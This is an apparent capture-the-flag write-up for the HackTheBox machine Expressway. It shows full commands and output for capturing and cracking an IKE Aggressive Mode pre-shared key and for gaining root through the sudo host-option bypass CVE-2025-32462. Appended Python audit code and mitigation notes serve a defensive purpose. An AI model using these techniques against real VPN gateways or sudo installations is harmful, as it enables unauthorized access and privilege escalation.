![[Expressway.png]]

# Reconnaissance

I started off with an Nmap scan and specified the following options:

- `-sC` to use default scripts
- `-sV` to gather service/version information
- `-oA` to save the output to a file
- `-p-` to scan all TCP ports

In another tab, I ran a second Nmap scan with the following options:

- `-sU` to specify a UDP scan
- `-oA` to save the output to a file

Looking at the results, there are only two open ports: TCP port 22 (SSH) and UDP port 500 (ISAKMP, the IKE port); the other UDP ports listed are only `open|filtered`.

```bash
┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~]
└──╼ [★]$ echo -e "\ntarget_ip=10.129.114.201\ntarget_domain=expressway.htb" | tee -a ~/.bashrc
target_ip=10.129.114.201
target_domain=expressway.htb

┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~]
└──╼ [★]$ exec bash

┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~]
└──╼ [★]$ echo -e "\n$target_ip $target_domain" | sudo tee -a /etc/hosts
10.129.114.201 expressway.htb

┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway]
└──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 20:55 CDT
Nmap scan report for expressway.htb (10.129.114.201)
Host is up (0.0088s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds

┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway]
└──╼ [★]$ sudo nmap -sU -oA nmap/udp $target_ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 20:56 CDT
Nmap scan report for expressway.htb (10.129.114.201)
Host is up (0.20s latency).
Not shown: 996 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

Nmap done at Thu Oct  9 21:15:10 2025 -- 1 IP address (1 host up) scanned in 1124.52 seconds
```

# Initial Access

## IKE Enumeration

Even though this is an easy box, I knew brute forcing SSH was not going to lead to initial access, but I tried anyway. No surprise there: no valid credentials were found, so I moved on to enumerating UDP port 500.

This was the first time I had enumerated UDP port 500, and I was not familiar with the Internet Key Exchange protocol, also known as IKE. IKE sets up the security associations on which IPsec tunnels between two devices are built, and it works in two phases. During phase one, the two devices negotiate a security association, establish a secure management tunnel, and authenticate each other via a pre-shared key, digital signatures, or public key encryption. Once that is done, phase two begins: the two devices create a separate, secure channel (the IPsec tunnel) that carries the VPN traffic.

`ike-scan` is a fantastic tool for enumerating IKE. First, I fingerprinted the service and performed transform enumeration. Based on the response from the endpoint, the following information was gathered:

- Encryption type is 3DES
- Hash type is SHA1
- Auth type is PSK

```bash
┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway]
└──╼ [★]$ sudo ike-scan -M $target_ip
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.114.201	Main Mode Handshake returned
	HDR=(CKY-R=93a2990d3c27dbe9)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.018 seconds (54.25 hosts/sec).
1 returned handshake; 0 returned notify
```

The Auth type of PSK piqued my interest. With this Auth type, it is possible to obtain a hash from the endpoint that can be cracked offline. To do so, run `ike-scan` with the following options:

- `-P` to output the Aggressive Mode pre-shared key parameters for offline cracking
- `-M` to split the payload into multiple lines, making it easier to read
- `-A` to use Aggressive Mode
- `-n fakeID` to specify an identification value
- `--pskcrack=hash.txt` to save the PSK parameters to a file for offline cracking

```bash
┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway]
└──╼ [★]$ sudo ike-scan -P -M -A -n fakeID --pskcrack=hash.txt $target_ip
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.114.201	Aggressive Mode Handshake returned
	HDR=(CKY-R=dd4a87e2d28c9a4b)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, [email protected])
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.020 seconds (48.80 hosts/sec).
1 returned handshake; 0 returned notify
```

To crack the hash, run `psk-crack` (shipped with `ike-scan`) against a wordlist.

```bash
┌─[us-dedivip-1]─[10.10.14.219]─[cspsec@htb-28hfzlcs5x]─[~/my_data/Expressway]
└──╼ [★]$ psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 07b5ae8ecd2b641017244581c3b3054bec2beb93
Ending psk-crack: 8045040 iterations in 6.467 seconds (1243926.51 iterations/sec)
```

The IKE Aggressive Mode handshake leaked the peer's identity, and thanks to password reuse, I was able to SSH into the target machine as the user `ike`.
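As an added example (not part of the writeup and not `ike-scan` code), the following parser reads the handshake block that `ike-scan -M` prints and reports the findings a defender would raise for this responder: the deprecated 3DES/SHA1/modp1024 transforms, PSK-authenticated Aggressive Mode handing out an offline-crackable hash, and the peer identity disclosed before authentication. The sample handshake and the peer ID `ike@expressway.htb` in it are constructed values, not the target's output.

```python
import re

# Constructed sample modelled on the `ike-scan -M -A` output shown in the writeup
# (the peer ID is a constructed value, not copied from the target).
SAMPLE = """\
10.129.114.201\tAggressive Mode Handshake returned
\tHDR=(CKY-R=dd4a87e2d28c9a4b)
\tSA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
\tKeyExchange(128 bytes)
\tNonce(32 bytes)
\tID(Type=ID_USER_FQDN, ike@expressway.htb)
\tHash(20 bytes)
"""

# Transform attributes worth flagging: deprecated ciphers/hashes and small DH groups.
WEAK = {
    "Enc": {"DES", "3DES"},
    "Hash": {"MD5", "SHA1"},
    "Group": {"1:modp768", "2:modp1024"},
}

def parse_handshake(text):
    """Extract mode, SA attributes and the peer ID from ike-scan -M output."""
    info = {"mode": None, "sa": {}, "id": None}
    if m := re.search(r"(Main|Aggressive) Mode Handshake returned", text):
        info["mode"] = m.group(1)
    if m := re.search(r"SA=\(([^)]*)\)", text):
        info["sa"] = dict(kv.split("=", 1) for kv in m.group(1).split())
    if m := re.search(r"ID\(Type=(\w+), ([^)]*)\)", text):
        info["id"] = (m.group(1), m.group(2))
    return info

def assess(info):
    """Findings for the responder: weak transforms, crackable PSK, leaked identity."""
    sa, findings = info["sa"], []
    for attr, bad in WEAK.items():
        if sa.get(attr) in bad:
            findings.append(f"weak {attr}: {sa[attr]}")
    if info["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        findings.append("aggressive mode with PSK: responder hash allows offline PSK cracking")
    if info["id"]:
        findings.append(f"peer identity sent before authentication: {info['id'][1]}")
    return findings
```

Mitigations the findings point at: disable Aggressive Mode (or move to IKEv2), replace 3DES/SHA1/group 2 with AES/SHA2/group 14 or stronger, and prefer certificate authentication over a PSK where Aggressive Mode cannot be turned off.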
# Privilege Escalation

## Abusing `sudo`'s Host Option

After a bit of enumeration, I discovered that the target system's `sudo` version was 1.9.17. There are a couple of CVEs associated with this version of `sudo`; I decided to pursue CVE-2025-32462. This CVE allows an attacker to bypass host-based `sudoers` policies by passing a `--host` (`-h`) value, an option `sudo` was only meant to honour when listing privileges with `-l`.

A system's `/etc/sudoers` file can specify what a user may do on a local or a remote system. Say a user has no `sudo` rights on host A but has unlimited `sudo` rights on host B. In this case, CVE-2025-32462 can be abused so that the user gets the rights associated with host B (unrestricted) while on host A.

To determine whether the CVE was even exploitable, I needed a valid hostname that appears in the `sudoers` policy. After looking in the logs, I found a reference to `offramp.expressway.htb`. And just like that, I was able to exploit CVE-2025-32462 to gain `root` privileges! As `root`, it was possible to look at the `/etc/sudoers` file and confirm that the user `ike` had host-based restrictions: the `SERVERS, !PROD` host list grants `ike` nothing on `expressway.htb` but `NOPASSWD:ALL` on `offramp.expressway.htb`.

```bash
ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password:
Sorry, user ike may not run sudo on expressway.
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

ike@expressway:~$ grep '.htb' -r /var/log 2>/dev/null
/var/log/squid/access.log.1:1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html

ike@expressway:~$ sudo -l -h offramp.expressway.htb
Matching Defaults entries for ike on offramp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ike may run the following commands on offramp:
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL

ike@expressway:~$ sudo -i -h offramp.expressway.htb
root@expressway:~# id
uid=0(root) gid=0(root) groups=0(root)

root@expressway:~# cat /etc/sudoers | grep '^#' -v
...SNIP...
Host_Alias SERVERS = expressway.htb, offramp.expressway.htb
Host_Alias PROD = expressway.htb
ike SERVERS, !PROD = NOPASSWD:ALL
ike offramp.expressway.htb = NOPASSWD:ALL
...SNIP...
```

# References

- [Pentesting IPsec/IKE VPN](https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html)
- [`ike-scan` GitHub Page](https://github.com/royhills/ike-scan)
- [CVE-2025-32462](https://access.redhat.com/security/cve/cve-2025-32462)
- [CVE-2025-32462 POC](https://www.exploit-db.com/exploits/52354)
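The host evaluation behind "Sorry, user ike may not run sudo on expressway" versus `(root) NOPASSWD: ALL` on `offramp`, as an added example that is not part of the writeup or of `sudo`: a small `sudoers` audit that applies host-list semantics (aliases, `!` negation, last match wins) to a constructed copy of the excerpt from the Privilege Escalation section, lists the rights a user holds on other hosts but not locally (the exposure CVE-2025-32462 turns into local root on an unpatched `sudo`), and checks whether a version string falls in the affected range. The excerpt is constructed from the writeup's output; the affected range (1.8.8 through 1.9.17, fixed in 1.9.17p1) is taken from the sudo advisory.

```python
import re

# Constructed sudoers excerpt modelled on the Expressway box's /etc/sudoers (not a
# copy of the system file); only Host_Alias lines and `user hostlist = cmd` specs.
SUDOERS = """\
Host_Alias SERVERS = expressway.htb, offramp.expressway.htb
Host_Alias PROD = expressway.htb
ike SERVERS, !PROD = NOPASSWD:ALL
ike offramp.expressway.htb = NOPASSWD:ALL
"""

def parse_sudoers(text):
    """Return ({alias: set(hosts)}, [(user, [host items], cmd)])."""
    aliases, specs = {}, []
    for line in text.splitlines():
        if m := re.match(r"Host_Alias\s+(\w+)\s*=\s*(.+)", line.strip()):
            aliases[m.group(1)] = {h.strip() for h in m.group(2).split(",")}
        elif m := re.match(r"(\S+)\s+(.+?)\s*=\s*(.+)", line.strip()):
            hosts = [h.strip() for h in m.group(2).split(",")]
            specs.append((m.group(1), hosts, m.group(3)))
    return aliases, specs

def host_matches(hostlist, host, aliases):
    """sudoers host-list semantics: '!' negates and the last matching item wins."""
    matched = False
    for item in hostlist:
        name = item.lstrip("!")
        if name == "ALL" or host in aliases.get(name, {name}):
            matched = not item.startswith("!")
    return matched

def rules_for(user, host, sudoers):
    aliases, specs = sudoers  # command specs granted when sudo evaluates for `host`
    return [cmd for u, hosts, cmd in specs
            if u == user and host_matches(hosts, host, aliases)]

def cross_host_exposure(user, local_host, sudoers):
    """Rules `user` has on other hosts but not locally (what -h unlocks on unpatched sudo)."""
    aliases, specs = sudoers
    known = {h for _, hosts, _ in specs for i in hosts
             for h in aliases.get(i.lstrip("!"), {i.lstrip("!")})}
    local = set(rules_for(user, local_host, sudoers))
    extra = {h: sorted(set(rules_for(user, h, sudoers)) - local) for h in known}
    return {h: r for h, r in sorted(extra.items()) if r and h != local_host}

def version_vulnerable(version):
    """CVE-2025-32462 affects sudo 1.8.8 through 1.9.17; 1.9.17p1 fixed it."""
    t = tuple(int(x or 0) for x in re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", version).groups())
    return (1, 8, 8, 0) <= t < (1, 9, 17, 1)
```

Until the package is updated past 1.9.17, any host-scoped rule this audit reports is effectively a local grant; removing the remote-host rules from the shared `sudoers` file closes the gap on its own.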